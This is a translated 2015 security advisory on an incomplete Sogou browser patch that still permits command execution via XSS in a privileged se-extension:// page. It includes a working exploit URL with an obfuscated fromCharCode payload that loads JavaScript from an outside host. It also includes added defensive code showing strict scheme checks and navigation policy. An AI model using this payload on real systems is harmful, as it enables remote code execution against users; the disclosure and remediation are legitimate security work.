Palliative fix: the Sogou browser still allows remote execution of arbitrary commands - Vulnerability warning - Black Bar Safety Net

2015-02-20T00:00:00
ID MYHACK58:62201559245
Type myhack58
Reporter Anonymous
Modified 2015-02-20T00:00:00

Description

1. Updated to the latest version.

[Figure: 1.jpg]

2. The vendor looked for the vulnerability and made some repairs, but the most fundamental issue, the missing restriction on navigating (jumping) into the privileged protocol, is still not fixed.

A. The XSS in signin.html was fixed as shown below:

[Figure: 2.jpg]

The regular expression looks elaborate and very complex, but in reality it does not even anchor the start of the string with ^.

A value such as javascript:alert(1);//http://www.baidu.com/ therefore bypasses the regex directly: the pattern finds the http:// URL further along in the string and accepts the whole value.
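The bypass above comes down to a regex that is matched as a search instead of a full-string check. The following is an added example, not code from the original post or from the Sogou browser: the real regex is only visible as a screenshot, so the weak pattern here is a constructed stand-in that reproduces the unanchored behaviour, and it is placed beside a hardened check that parses the value and allows only an explicit scheme allowlist.

```javascript
// Added example (not from the original advisory or the Sogou code base).
// WEAK_PATTERN is a constructed stand-in for an unanchored "is this a URL"
// regex; the real pattern is only shown as a screenshot in the post.

// A pattern that tries to recognise an http(s) URL but never anchors with ^.
// RegExp.test() succeeds if the pattern matches anywhere in the string, so a
// javascript: prefix in front of the http:// part is simply ignored.
const WEAK_PATTERN = /https?:\/\/[\w.-]+(\/[^\s"'<>]*)?/i;

function weakIsSafeRedirect(url) {
  return WEAK_PATTERN.test(url);
}

// Hardened check: parse the value with the WHATWG URL constructor and accept
// only an explicit allowlist of schemes. Anything that fails to parse, or
// parses to another scheme (javascript:, data:, se-extension:, ...), is
// rejected. The parser also normalises case and strips leading control
// characters and spaces, so "JaVaScRiPt:" and " javascript:" are both caught.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function strictIsSafeRedirect(url) {
  let parsed;
  try {
    parsed = new URL(url); // no base URL: relative values are rejected too
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Constructed test inputs. The first string is the bypass quoted in the post;
// the others are variants a validator has to handle.
const SAMPLES = [
  'javascript:alert(1);//http://www.baidu.com/',
  'http://www.baidu.com/',
  'https://example.test/path?x=1',
  'JaVaScRiPt:alert(1)//http://a.b/',
  ' javascript:alert(1);//https://x.y/',
  'data:text/html,<a href="http://a.b/">',
];

// Returns the subset of SAMPLES that a given check accepts.
function evaluate(check) {
  return SAMPLES.filter(check);
}

console.log('weak check accepts:', evaluate(weakIsSafeRedirect));
console.log('strict check accepts:', evaluate(strictIsSafeRedirect));
```

The weak pattern accepts every sample, including all four non-http values, because each of them carries an http:// or https:// substring; the strict check accepts only the two genuine http(s) URLs. Anchoring the regex with ^ and $ would also close the quoted bypass, but parsing and comparing the scheme is the check that survives the case and whitespace variants.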

B. When the top-level URL is not se-extension://, extension API calls are restricted, but when the current URL itself is se-extension://, the extension API can still be called.

Therefore, although the call can no longer be embedded through an iframe (whose top-level URL stays that of the web page), combining location.href with window.open still executes the command, because the newly opened window is its own top-level document. The code is as follows:

First, use location.href to jump to the signin.html XSS page:

Code:

// Jump into the se-extension:// origin; the code parameter carries the XSS payload from section A
location.href='se-extension://ext-1055834318/signin.html?app=test&code=javascript:document.write("<img src%3D1 onerror%3Deval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,49,49,49,44,57,57,44,52,55,44,49,49,53,44,49,49,49,44,49,48,51,44,49,49,49,44,49,49,55,44,52,54,44,49,48,54,44,49,49,53,41,43,34,63,34,43,77,97,116,104,46,114,97,110,100,111,109,40,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))>");//http://www.baidu.com/';

The XSS executes.
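Section B and the steps above describe a gate that inspects only the scheme of the top-level document, which is why an iframe is blocked but a window opened with window.open is not. The following is an added example, not code from the original post or from the Sogou browser: it models that gate and the two navigation paths as plain functions, and sets the patched policy beside the navigation policy the post calls for, in which content from an ordinary web origin may not navigate into the privileged scheme at all. The se-extension URL uses a placeholder extension id, and the web origin is constructed.

```javascript
// Added example (not from the original advisory or the Sogou code base).
// Models the post's description of the patched check and the missing
// protocol-jump restriction; names and URLs here are constructed.
const PRIVILEGED_SCHEME = 'se-extension:';

function scheme(url) {
  return new URL(url).protocol;
}

// A browsing context: its own document URL and the URL of its top-level document.
function makeContext(url, topUrl) {
  return { url, topUrl };
}

// The patched API gate as the post describes it: the privileged API is
// reachable only when both the current document and the top-level document
// are se-extension:// pages.
function patchedApiGate(ctx) {
  return scheme(ctx.url) === PRIVILEGED_SCHEME && scheme(ctx.topUrl) === PRIVILEGED_SCHEME;
}

// <iframe src=...>: the child keeps the parent's top-level URL, so the gate
// above blocks it when the parent is an ordinary web page.
function embedFrame(parent, targetUrl, policy) {
  if (!policy.allowNavigation(parent.url, targetUrl)) return null;
  return makeContext(targetUrl, parent.topUrl);
}

// window.open (or a location.href jump): the result is a new top-level
// document, so its top-level URL is itself.
function openWindow(from, targetUrl, policy) {
  if (!policy.allowNavigation(from.url, targetUrl)) return null;
  return makeContext(targetUrl, targetUrl);
}

// Policy as patched: navigation is never refused; only the API gate decides.
const PATCHED_POLICY = { allowNavigation: () => true };

// Hardened policy: navigations into the privileged scheme are allowed only
// when the initiating document is itself privileged. This is the
// protocol-jump restriction the post says is still missing.
const HARDENED_POLICY = {
  allowNavigation: (initiatorUrl, targetUrl) =>
    scheme(targetUrl) !== PRIVILEGED_SCHEME || scheme(initiatorUrl) === PRIVILEGED_SCHEME,
};

// Placeholder extension id; the real id is not reproduced here.
const PRIVILEGED_PAGE = 'se-extension://ext-placeholder/signin.html';
const WEB_PAGE = 'http://web.example/';

// Can an ordinary web page reach the privileged API via the given method?
function apiReachableFromWeb(method, policy) {
  const web = makeContext(WEB_PAGE, WEB_PAGE);
  const ctx = method === 'iframe'
    ? embedFrame(web, PRIVILEGED_PAGE, policy)
    : openWindow(web, PRIVILEGED_PAGE, policy);
  return ctx !== null && patchedApiGate(ctx);
}

// Does a genuine extension page still work under the policy?
function extensionPageStillWorks(policy) {
  const ext = makeContext(PRIVILEGED_PAGE, PRIVILEGED_PAGE);
  const ctx = openWindow(ext, PRIVILEGED_PAGE, policy);
  return ctx !== null && patchedApiGate(ctx);
}

for (const [name, policy] of [['patched', PATCHED_POLICY], ['hardened', HARDENED_POLICY]]) {
  console.log(name, {
    viaIframe: apiReachableFromWeb('iframe', policy),
    viaWindowOpen: apiReachableFromWeb('open', policy),
    extensionPageWorks: extensionPageStillWorks(policy),
  });
}
```

Under the patched policy the iframe path is blocked but the window.open path passes the gate, which is exactly the gap the post exploits; under the hardened policy both paths are refused at navigation time, while a real extension page opening another extension page is unaffected. The point for a defender is that a gate evaluated after navigation cannot substitute for a rule about who may initiate the navigation.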
